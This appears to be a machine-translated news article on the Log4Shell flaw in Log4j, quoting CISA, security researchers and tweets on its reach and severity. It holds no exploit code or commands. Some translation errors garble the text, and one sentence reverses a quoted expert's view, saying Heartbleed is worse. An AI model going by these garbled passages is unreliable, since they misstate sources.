The Zeroday Rift CVE-2021-44228baptized with the name of Log4Shell, represents a major cybersecurity issue that will take monthseven years, to be able to be completely resolved due to its dissemination and the ease of exploitation of the flaw itself: the opinion on which various computer security researchers converge after Log4Shell came to light Thursday, December 9 last.
On the subject also voices the United States Cybersecurity and Infrastructure Security Agency, pointing out that the vulnerability affects hundreds of millions of devices and that “no single action will fix the problem”, stating that it is a mistake to think that things can be fixed “in a week or two”. CISA warns that the vulnerability will likely be exploited as springboard for diverse and sophisticated types of attacks and compromisesand that the time needed to take shelter is really limited.
We remind you that Log4Shell is a vulnerability affecting the open-source Java tool Log4j, widely used for logging operations on an infinite number of applications and services, and which allows remote code execution without authentication. Its distribution is therefore extremely wide, which combined with the ease of exploitation of the flaw makes Log4Shell a particularly serious threat, even more important than HeathBleed, EternalBlue or ShellShock.
While, at least for now, the vulnerability appears to have been exploited primarily to deliver cryptomining malware, security researchers expect to see an evolution in the type of attacks. The ability to execute unauthenticated remote code in a simple way opens up a wide range of possibilities for attackers. Steve Povolnyresponsible for advanced threat research for McAfee Enterprise and FireEye, observed that with the increasing number of activities following the discovery of the flaw, it is reasonable to assume that many realities may have already been compromised. Povolny also warns about the possibility of observing an evolution of the attacks.
Sean Gallagherresearcher for Sophos, pointed out in particular that the vulnerability could be exploited by attackers attempting to install remote access and persistence tools and is already being used to attempt to expose keys used by Amazon Web Service accounts.
hear people appear #log4shell is “as bad as heartbleed” – imo it’s way worse. in addition to having RCE as an impact, the number of interdependencies around log4j (and in particular their age) is an order of magnitude higher
— cje (@caseyjohnellis) December 11, 2021
Second Casey John EllisSecurity expert and founder of Bugcrowd, HeartBleed’s problem is far more serious, as log4j propagation and various interdependencies are “orders of magnitude higher”. Florian Roth from Nextron Systems talks about a “0day cluster bomb”, and what Log4Shell is a vulnerability that can potentially cause hundreds and thousands more zeroday flaws in all kinds of software.
What people seem to miss:
THE #Log4Shell the vulnerability is not just a 0day RCE.
It’s a vulnerability that causes hundreds and thousands of 0 days in all sorts of software products.
It’s a 0day cluster bomb. pic.twitter.com/Cij9kK4Cvg
— Florian Roth ️ (@cyb3rops) December 11, 2021
And in particular concerning the diffusion of the problem, Jaana Doganlead engineer for AWS, to provide additional context:
A project with a footprint like Log4j cannot be avoided as a transient dependency even if you don’t import it directly. Log4j is a canonical logging utility for a huge ecosystem. His current radius goes beyond due diligence. https://t.co/FqSr68x7JL
— Jaana Dogan ヤナドガン (@rakyll) December 13, 2021
The immediate action to take to eliminate the flaw is to update Log4j to at least version 2.15.x which requires Java 8. Those who cannot update Log4j due to complex interdependencies can resort to partial solutions and temporary, well summarized in this complete and in-depth collection on Log4Shell.